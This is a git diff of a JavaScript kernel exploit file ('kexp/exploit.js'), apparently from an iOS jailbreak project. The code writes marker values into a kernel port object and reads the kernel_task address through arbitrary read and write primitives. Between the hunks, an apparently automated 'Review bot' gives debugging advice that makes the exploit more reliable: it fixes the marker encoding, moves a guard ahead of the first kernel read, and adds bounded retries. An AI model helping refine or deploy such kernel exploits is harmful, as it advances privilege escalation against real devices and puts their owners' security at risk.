Diffstat (limited to 'src/js/kexp/exploit.js')
-rwxr-xr-x src/js/kexp/exploit.js 12
1 files changed, 10 insertions, 2 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index 6f34aaf..47ff1c0 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -502,10 +502,15 @@ again: while (true) {
printf("fuck\n");
printf("fuck\n");
- write_u32(kport + 0x50, kptr + 0x78 - TASK_BSDINFO_OFFSET);
+ for (var i = 0; i < 0x78; i += 4) {
+ write_u32(kport + i, 0x41410000 | i);
+ }
+ for (var i = 0; i < 0x78; i += 4) {
+ write_u32(kport + i + 0x78, 0x41420000 | i);
+ }
+// write_u32(kport + 0x50, kptr + 0x78 - TASK_BSDINFO_OFFSET);
printf("fuck\n");
// write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
- write_u32(ptr, 0x41414141 - BSDINFO_PID_OFFSET);
printf("fuck\n");
var tst_str = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0";
printf("fuck\n");
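Review bot: The two marker loops do not encode the same thing — the first writes `0x41410000 | i` at `kport + i`, so the low half-word is the real offset into the port object, but the second writes `0x41420000 | i` at `kport + i + 0x78`, so a fault that shows up as `0x4142000c` is offset 0x84, not 0x0c. A comment above the first loop should record the scheme, e.g. `// marker 0x4141xxxx = offset xxxx into kport; 0x4142xxxx = offset 0x78 + xxxx`, so the value seen in a panic log can be mapped back without re-reading the loops. Both loops redeclare `var i` in the same function scope; `let i` in each `for` header keeps the indices block-scoped and avoids the duplicate declaration. The real `write_u32(kport + 0x50, ...)` is left commented out rather than removed, which is reasonable for a one-off spray but deserves a `// TODO: restore once the field offset is confirmed` so it is not forgotten. The enclosing labelled `while (true)` loop starts before this hunk.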
@@ -539,6 +544,9 @@ again: while (true) {
printf("IF YOU SEE THIS AND IT LOOKS LEGIT, SHIT HAS FUCKING HAPPENED\n");
printf("fuck\n");
call4arg(sym_cache["puts"], sptr("kernel_task address: 0x" + pad_left(read_u32(kernel_task_addr).toString(16), '0', 8)), 0, 0, 0);
+ if (kernel_task_addr === 0xffffffff) {
+ continue again;
+ }
scall("printf", "kernel_task address: 0x%08x\n", read_u32(kernel_task_addr));
printf("fuck\n");
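Review bot: The new `if (kernel_task_addr === 0xffffffff) continue again;` guard is placed after the `call4arg(sym_cache["puts"], ...)` line, which already evaluates `read_u32(kernel_task_addr)` — so when the sentinel value is present the read at 0xffffffff happens before the check can skip it. Move the three added lines above that `call4arg` line so the guard covers both the `puts` and the `scall("printf", ...)` reads. `continue again` restarts the labelled loop with no attempt counter, so a lookup that keeps returning the sentinel spins forever; if that is not intended, a bounded retry such as `if (++attempts > MAX_ATTEMPTS) break again;` next to the guard would end it. The `again:` loop itself begins outside this hunk.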